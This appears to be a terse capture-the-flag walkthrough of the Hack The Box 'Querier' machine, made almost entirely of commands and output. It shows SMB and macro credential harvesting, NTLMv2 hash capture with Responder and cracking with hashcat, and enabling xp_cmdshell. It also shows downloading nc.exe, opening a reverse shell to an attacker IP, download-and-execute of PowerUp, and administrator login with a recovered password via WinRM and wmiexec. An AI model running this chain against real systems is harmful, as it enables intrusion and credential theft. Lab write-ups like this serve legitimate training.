# nmap -sC -sV -p- 10.10.10.125 -oA querierStarting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 00:56 ESTNmap scan report for querier.htb (10.10.10.125)Host is up (0.013s latency).Not shown: 65521 closed portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds?1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00| ms-sql-ntlm-info:

smbclient -U QUERIER/invalid //10.10.10.125/Reports
smb: \> get "Currency Volume Report.xlsm"

# strings vbaProject.bin macro to pull data for client volume reportsn.Conn]Openrver=<SELECT * FROM volume;word>MsgBox "connection successful"Set rs = conn.Execute("SELECT * @@version;")Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6

mssqlclient.py -windows-auth querier/reporting:PcwTWTHRwryjc\$c6@$TARGET_IP

# 开启responderresponder -I eth0 -wrf

hashcat -m 5600 ./test.nltmv2 ~/hacktools/worddic/rockyou.txt --force

MSSQL-SVC::QUERIER:7808a070c190110d:0ecfa929ab261b727253df84af7cf1f2:0101000000000000c0653150de09d20128624bd821667131000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d201060004000200000008003000300000000000000000000000003000009828af224f44d2d8ddb8f0e488a92d1bfff623c7fb3b5448ed22e96f6842e89b0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000:corporate568

SQL> EXEC sp_configure 'show advanced options', 1;[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.SQL> RECONFIGURE;SQL> EXEC sp_configure 'xp_cmdshell', 1;[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.SQL> RECONFIGURE;SQL> xp_cmdshell "dir c:\users"output...

SQL> xp_cmdshell "powershell -command Invoke-WebRequest -Uri http://10.10.14.23/nc.exe -OutFile c:\programdata\nc.exe"SQL> xp_cmdshell "c:\programdata\nc.exe 10.10.14.6 1234 -e c:\windows\system32\cmd.exe"
# nc监听nc -lvnp 1234

PS C:\Windows\system32> IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.6/PowerUp.ps1")PS C:\Windows\system32> invoke-allchecks[*] Checking for cached Group Policy Preferences .xml files....Changed : {2021-03-14 14:12:48}UserNames : {Administrator}NewName : [BLANK]Passwords : {MyUnclesAreMarioAndLuigi!!1!}File : C:\ProgramData\Microsoft\GroupPolicy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml       C:\Windows\system32>powershell

require 'winrm'
# Author: Alamotconn = WinRM::Connection.new(  endpoint: 'http://10.10.10.125:5985/wsman',  user: 'querier\administrator',  password: 'MyUnclesAreMarioAndLuigi!!1!',)
command=""
conn.shell(:powershell) do |shell|    until command == "exit\n" do        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")        print(output.output.chomp)        command = gets        output = shell.run(command) do |stdout, stderr|            STDOUT.print stdout            STDERR.print stderr        end    end    puts "Exiting with code #{output.exitcode}"end
# ruby querier.rb
...

wmiexec.py Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125